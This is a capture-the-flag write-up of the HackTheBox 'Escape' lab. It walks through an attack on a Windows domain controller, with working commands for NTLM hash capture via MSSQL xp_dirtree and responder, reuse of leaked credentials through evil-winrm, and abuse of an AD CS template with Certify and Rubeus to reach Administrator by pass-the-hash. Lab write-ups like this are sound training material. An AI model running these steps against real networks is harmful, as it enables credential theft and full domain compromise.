Escape — HackTheBox
Escape is a medium machine from HackTheBox. It involves enumerating smb shares and finding PDF containing SQL Server credentials, stealing NTLMv2 hash of SQL service, reading log files for credentials and finally abusing the AD CS template for getting shell as administrator.
NMAP
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-13 00:59:46Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-06-13T01:01:16+00:00; +8h00m00s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-06-13T01:01:17+00:00; +8h00m00s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-06-12T06:40:35
|_Not valid after: 2053-06-12T06:40:35
|_ssl-date: 2023-06-13T01:01:16+00:00; +8h00m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-06-13T01:01:16+00:00; +8h00m00s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-06-13T01:01:17+00:00; +8h00m00s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49686/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc Microsoft Windows RPC
49705/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
63835/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m59s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-06-13T01:00:36
|_ start_date: N/APort 139/445 (SMB)
We can list shares and have read access to Public share.
There’s a PDF file on the share, let’s download it.
The PDF file contains the instructions to access the SQL Server.
It also provides credentials for Public User.
Port 1433 (MSSQL Server)
Using the credentials we can login to SQL Server.
impacket-mssqlclient sequel.htb/PublicUser:GuestUserCantWrite1@dc.sequel.htb
There was no interesting data in the database. So, i tried to run commands through MSSQL server using the xp_cmdshell stored procedure but it did not work. Next, thing i tried is force SQL server to authenticate to my host. So, started the responder and using xp_dirtree procedure pointed it to my host and captured the NTLMv2 hash.
sudo responder -I tun0
SQL> xp_dirtree '\\10.10.14.104\any\thing'
Cracking the hash using hashcat, we get plaintext password for sql_svc account.
Using the found credentials, i tried to login via winrm and successfully got a hit.
crackmapexec winrm dc.sequel.htb -u sql_svc -p 'REGGIE1234ronnie'
With the credentials, I can got shell as sql_svc using evil-winrm.
evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
There was only one user on the box. There was SQLServer directory in the C drive. In the logs folder it had error logs.
Reading the logs, we get the credentials for Ryan Cooper user. Looks like, he mistakenly entered his password in the username field. XD
So, with the found credentials, we get shell as ryan.cooper.
crackmapexec winrm dc.sequel.htb -u 'Ryan.Cooper' -p 'NuclearMosquito3'
evil-winrm -i 10.10.11.202 -u 'Ryan.Cooper' -p 'NuclearMosquito3'
Abusing AD CS
After logging in, i used winpeas to enumerate and found that AD Certificate Services are running.
The following guide explains the steps to abuse AD CS misconfigs.
The first step is to identify the misconfigured/vulnerable template using Certify. We found one named UserAuthentication.
.\Certify.exe find /vulnerable
The next step is to request a certificate with alternative name of Administrator. It will returns a private key and certificate. Copy them both to your host save as cert.pem.
.\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
Next, step is covert the certificate into pfx format with openssl using the given command.
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Last, step is to copy the pfx file from above command to the target host and request a TGT as Administrator using Rubeus by passing the certificate. In the output, we can see the NTLM hash of Administrator.
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:password /getcredentials
By passing the hash using evil-winrm, we get shell as Administrator.
evil-winrm -i 10.10.11.202 -u administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
References
- Stealing NTLM hash: https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server#steal-netntlm-hash-relay-attack
- Misconfigured Certificate Template to Domain Admin: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-misconfigured-certificate-template-to-domain-admin
- AD CS Domain Escalation: https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation
- Abusing AD CS: https://systemweakness.com/exploiting-cve-2022-26923-by-abusing-active-directory-certificate-services-adcs-a511023e5366
- Compiled Binaries: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
